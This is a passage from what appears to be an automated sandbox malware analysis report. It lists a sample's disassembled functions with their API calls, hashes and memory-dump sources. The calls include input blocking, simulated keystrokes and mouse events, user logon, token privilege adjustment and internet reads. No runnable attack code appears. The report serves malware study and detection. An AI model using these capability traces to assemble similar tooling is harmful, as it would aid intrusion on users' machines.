                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                          • String ID:
                          • API String ID: 99427753-0
                          • Opcode ID: de992425039031bb77cc985e5270f76238a9ed345cdb511b690a59d61831d211
                          • Instruction ID: bacb9f9407e761acb7926bfc0e553b1f265c39f8457643c3e291ff02d6eb9e96
                          • Opcode Fuzzy Hash: de992425039031bb77cc985e5270f76238a9ed345cdb511b690a59d61831d211
                          • Instruction Fuzzy Hash: C341E7757002016FEB10BF649C8AFAE7BA4FB89710F04845CF956AB3D2CA749D408F91
                          Function 0059577B Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                          • String ID:
                          • API String ID: 292994002-0
                          • Opcode ID: b72703e230535ff826b4b11a1921e7dbd0ed43d07064bd1b8adc3729f9d88204
                          • Instruction ID: 0bb2d26fa88137ee0a078b01875a895a6f807f8369a0f958e42db0a7f0c0a6aa
                          • Opcode Fuzzy Hash: b72703e230535ff826b4b11a1921e7dbd0ed43d07064bd1b8adc3729f9d88204
                          • Instruction Fuzzy Hash: 4011C431700911AFEF225F66EC48A6EBF98FF95760B504428F806D7281DB30E9118BA1
                          Function 0058279E Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                          Download Yara Rule
                          APIs
                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00582891
                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 005828C8
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Internet$AvailableDataFileQueryRead
                          • String ID:
                          • API String ID: 599397726-0
                          • Opcode ID: 81bc7a1a709641a413e04a23c0ffac366181ce7834bced38f8d26ed81e11c7b1
                          • Instruction ID: e9be18e3246e4aaa7c00702836554da8803459e0444483f0cc88e287d83a2b70
                          • Opcode Fuzzy Hash: 81bc7a1a709641a413e04a23c0ffac366181ce7834bced38f8d26ed81e11c7b1
                          • Instruction Fuzzy Hash: 81416371A04309BFEF20AA95DC85EBB7FACFB40714F10446EFE05B6181EA719E459B60
                          Function 0056917C Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00530F16: std::exception::exception.LIBCMT ref: 00530F4C
                            • Part of subcall function 00530F16: __CxxThrowException@8.LIBCMT ref: 00530F61
                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005691C6
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005691F3
                          • GetLastError.KERNEL32 ref: 00569200
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                          • String ID:
                          • API String ID: 1922334811-0
                          • Opcode ID: 1236794aae4bf6ba5870fc41751e96815443d72235ef0db5a80b406702e1239a
                          • Instruction ID: 0b7c0ea68f76abf4848dcae2fc6ae1b84fc302a25c1d0caf5952b44e148b13a9
                          • Opcode Fuzzy Hash: 1236794aae4bf6ba5870fc41751e96815443d72235ef0db5a80b406702e1239a
                          • Instruction Fuzzy Hash: 07118CB1414306AFD728DF64DC89D6BBBBCFB85711B20852EE45693281EB30AC44CB60
                          Function 005740C1 Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 005740DE
                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0057411F
                          • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0057412A
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CloseControlCreateDeviceFileHandle
                          • String ID:
                          • API String ID: 33631002-0
                          • Opcode ID: 1f7007f50ccbf2390d805a7d42f9f42b7df152291efea8a8b43646ddcf007ebc
                          • Instruction ID: 7b0e737ca6e43866ef0808a831b18125d0f0b74cfc40d885d002da1d6f93d64c
                          • Opcode Fuzzy Hash: 1f7007f50ccbf2390d805a7d42f9f42b7df152291efea8a8b43646ddcf007ebc
                          • Instruction Fuzzy Hash: 2A118275E01228BFDB108FA5EC44FAFBFBCEB45B60F108156F904E7280C6705A059BA1
                          Function 00574D89 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                          Download Yara Rule
                          APIs
                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00574DB2
                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00574DC9
                          • FreeSid.ADVAPI32(?), ref: 00574DD9
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: AllocateCheckFreeInitializeMembershipToken
                          • String ID:
                          • API String ID: 3429775523-0
                          • Opcode ID: 32aacb0a264b88d606d3689b4bc439399ed78854bdc4c4986ca4f81b55300d1a
                          • Instruction ID: 713d093467c5566b2951669509dd5f1f57265c64810bca82682aa6f3ae0f70ad
                          • Opcode Fuzzy Hash: 32aacb0a264b88d606d3689b4bc439399ed78854bdc4c4986ca4f81b55300d1a
                          • Instruction Fuzzy Hash: 0AF03C7591120CBFDB00DFE09C89AAEBBB8FB08301F504469A501E2180E6306A049B50
                          Function 00571932 Relevance: 3.0, APIs: 2, Instructions: 32keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0057196D
                          • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00571980
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: InputSendkeybd_event
                          • String ID:
                          • API String ID: 3536248340-0
                          • Opcode ID: 7046bbab83259e1cd36bcbac35d3db46eca683a1612d06670ae2623bcbd4446f
                          • Instruction ID: c2be63735bafdea1531cae7d7f56e7d06f45aa1bb84bbfd7a4c8576fa7d9579e
                          • Opcode Fuzzy Hash: 7046bbab83259e1cd36bcbac35d3db46eca683a1612d06670ae2623bcbd4446f
                          • Instruction Fuzzy Hash: 30F0497191020DAFDB14CF94C805BFEBBB4FF18315F00804AF95996291C7798615EF94
                          Function 0057A51A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,0058991A,?,005A098C,?), ref: 0057A547
                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,0058991A,?,005A098C,?), ref: 0057A559
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ErrorFormatLastMessage
                          • String ID:
                          • API String ID: 3479602957-0
                          • Opcode ID: fefeb7d7efca60c2ce1366a4a0011b03184d664c64cec870b122f2cfaa21d54a
                          • Instruction ID: d508d56aa0dfe3613924bad8e02c549c44cdac43b30d67e96a9c40864196f0d8
                          • Opcode Fuzzy Hash: fefeb7d7efca60c2ce1366a4a0011b03184d664c64cec870b122f2cfaa21d54a
                          • Instruction Fuzzy Hash: 82F0823551522EABDF20AFA8DC48FEA7B6DBF09361F008155F909D6181D6309A44DBE1
                          Function 00568BCC Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00568D0A), ref: 00568BE1
                          • CloseHandle.KERNEL32(?,?,00568D0A), ref: 00568BF3
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: AdjustCloseHandlePrivilegesToken
                          • String ID:
                          • API String ID: 81990902-0
                          • Opcode ID: 720df7b23e4d143ab3911b14ec81c0f803c68a716dcef42629b472d7b1bcd597
                          • Instruction ID: aad7b0eee5c7d6ab23309d8f6ec9e1195a2e78e71e9082d5d82c49e402405195
                          • Opcode Fuzzy Hash: 720df7b23e4d143ab3911b14ec81c0f803c68a716dcef42629b472d7b1bcd597
                          • Instruction Fuzzy Hash: 59E0EC72014611AFEB262B64EC19EB77FE9FF04311B14992EF496814B0DB72ACD0EB50
                          Function 0053A2B5 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00538EB7,?,?,?,00000001), ref: 0053A2BA
                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0053A2C3
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 664a5a75ae3dfc09ab23da50a4b997cf7ff40be1ac79b3a683e3e545b68532f2
                          • Instruction ID: 2c49651d7f6070359c07edbd84189f3a7dbf0addc6df89960c80203f11c136ba
                          • Opcode Fuzzy Hash: 664a5a75ae3dfc09ab23da50a4b997cf7ff40be1ac79b3a683e3e545b68532f2
                          • Instruction Fuzzy Hash: B2B09231074208ABCE402B91EC19B883F68EB56BA2F005412F60D440A0CBA25454AA91
                          Function 005843B9 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • BlockInput.USER32(00000001), ref: 005843D4
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: BlockInput
                          • String ID:
                          • API String ID: 3456056419-0
                          • Opcode ID: 0e1aa0d8db3b24607431d6698116844eda784bde1bb257d3eb57a6c42aeefdc3
                          • Instruction ID: 88eacb87f1f767598eca4e99aeb620b5137b44bae0cbb2ac4acac9838e8c2b0b
                          • Opcode Fuzzy Hash: 0e1aa0d8db3b24607431d6698116844eda784bde1bb257d3eb57a6c42aeefdc3
                          • Instruction Fuzzy Hash: CEE048712105169FD710BF59E404A96FBD8BF95760F008815FD45D7351DEB0EC918F90
                          Function 0057504F Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                          Download Yara Rule
                          APIs
                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00575072
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: mouse_event
                          • String ID:
                          • API String ID: 2434400541-0
                          • Opcode ID: 4e9c048fc0e67a633652105619400c69a894576a625ca2590fc6e5ee5ed6119d
                          • Instruction ID: aa900d91aacb38466093f61ffc7a871cbe8349d19c6b83a42350e828cb7e99c6
                          • Opcode Fuzzy Hash: 4e9c048fc0e67a633652105619400c69a894576a625ca2590fc6e5ee5ed6119d
                          • Instruction Fuzzy Hash: B5D05EA0160B05B8FC281B21BC1FF761B08F3517C1F88C549710ACA0C1FCC0684CB470
                          Function 0056914C Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                          Download Yara Rule
                          APIs
                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00568D8A), ref: 0056916C
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: LogonUser
                          • String ID:
                          • API String ID: 1244722697-0
                          • Opcode ID: 4b6f3a062dce57443aba8028b2365d32bbbea68a8aa13f3c1cf38c81b19b9540
                          • Instruction ID: 1e383b6dd9f94d3105d9021ff0fb5bba74ed22417ea444535737a5da9b24b108
                          • Opcode Fuzzy Hash: 4b6f3a062dce57443aba8028b2365d32bbbea68a8aa13f3c1cf38c81b19b9540
                          • Instruction Fuzzy Hash: 10D05E322A050EABEF018EA4DC05EAE3B69EB04B01F808111FE15C50A0C775E835AB60
                          Function 00550652 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                          Download Yara Rule
                          APIs
                          • GetUserNameW.ADVAPI32(?,?), ref: 00550664
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: NameUser
                          • String ID:
                          • API String ID: 2645101109-0
                          • Opcode ID: 783c353837b004930bbfed6862e98ded46af42b1f86cad700ac550f588bfbf81
                          • Instruction ID: e409d80eb8246f426596a30696696e9c6b5d0c53dd1c6bd6eb9ad28ad0995411
                          • Opcode Fuzzy Hash: 783c353837b004930bbfed6862e98ded46af42b1f86cad700ac550f588bfbf81
                          • Instruction Fuzzy Hash: 98C04CF1810519DBCB05DB90D98CDFE77BCBB05308F100456A101F2140D7749B489B71
                          Function 0053A284 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                          Download Yara Rule
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0053A28A
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 562cb6d914b914e197e0482dd089c50fc3edda9a039f02feaa69da2f7624f206
                          • Instruction ID: 9586ae2843f6e5dcfa8b43e780edaa2ffe0491223b175c712bc3c9715dc840b5
                          • Opcode Fuzzy Hash: 562cb6d914b914e197e0482dd089c50fc3edda9a039f02feaa69da2f7624f206
                          • Instruction Fuzzy Hash: BFA0223003020CFBCF002F82FC08888BFACEB023E0B008022F80C00032CB33A820AAC0
                          Function 00593971 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                          Download Yara Rule
                          APIs
                          • CharUpperBuffW.USER32(?,?,005A0980), ref: 00593A2D
                          • IsWindowVisible.USER32(?), ref: 00593A51
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: BuffCharUpperVisibleWindow
                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                          • API String ID: 4105515805-45149045
                          • Opcode ID: 8a5c0f89d6012e303cebdb9747d64eb18a7dd7dd97bdcde144e692f865b6ee92
                          • Instruction ID: c506939c9b99427ee6ddc5663d8e2548aee0034844f022d97f47540bbc55a4fb
                          • Opcode Fuzzy Hash: 8a5c0f89d6012e303cebdb9747d64eb18a7dd7dd97bdcde144e692f865b6ee92
                          • Instruction Fuzzy Hash: B7D15E34204306DBCF14EF50C469E6ABFA9BFD4344F545958B8965B2E2CB31DE4ACB82
                          Function 0059A9C7 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                          Download Yara Rule
                          APIs
                          • SetTextColor.GDI32(?,00000000), ref: 0059AA1D
                          • GetSysColorBrush.USER32(0000000F), ref: 0059AA4E
                          • GetSysColor.USER32(0000000F), ref: 0059AA5A
                          • SetBkColor.GDI32(?,000000FF), ref: 0059AA74
                          • SelectObject.GDI32(?,00000000), ref: 0059AA83
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0059AAAE
                          • GetSysColor.USER32(00000010), ref: 0059AAB6
                          • CreateSolidBrush.GDI32(00000000), ref: 0059AABD
                          • FrameRect.USER32(?,?,00000000), ref: 0059AACC
                          • DeleteObject.GDI32(00000000), ref: 0059AAD3
                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0059AB1E
                          • FillRect.USER32(?,?,00000000), ref: 0059AB50
                          • GetWindowLongW.USER32(?,000000F0), ref: 0059AB7B
                            • Part of subcall function 0059ACB7: GetSysColor.USER32(00000012), ref: 0059ACF0
                            • Part of subcall function 0059ACB7: SetTextColor.GDI32(?,?), ref: 0059ACF4
                            • Part of subcall function 0059ACB7: GetSysColorBrush.USER32(0000000F), ref: 0059AD0A
                            • Part of subcall function 0059ACB7: GetSysColor.USER32(0000000F), ref: 0059AD15
                            • Part of subcall function 0059ACB7: GetSysColor.USER32(00000011), ref: 0059AD32
                            • Part of subcall function 0059ACB7: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0059AD40
                            • Part of subcall function 0059ACB7: SelectObject.GDI32(?,00000000), ref: 0059AD51
                            • Part of subcall function 0059ACB7: SetBkColor.GDI32(?,00000000), ref: 0059AD5A
                            • Part of subcall function 0059ACB7: SelectObject.GDI32(?,?), ref: 0059AD67
                            • Part of subcall function 0059ACB7: InflateRect.USER32(?,000000FF,000000FF), ref: 0059AD86
                            • Part of subcall function 0059ACB7: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0059AD9D
                            • Part of subcall function 0059ACB7: GetWindowLongW.USER32(00000000,000000F0), ref: 0059ADB2
                            • Part of subcall function 0059ACB7: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0059ADDA
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                          • String ID:
                          • API String ID: 3521893082-0
                          • Opcode ID: 268c3d33db24594044ed4a3ea758872a9e1d343ea3429af0ae34dd0a94b99533
                          • Instruction ID: f3dd2184e1ab8d2b8e71e990def320d5994b5bbec71cf626b8415b7045c4516a
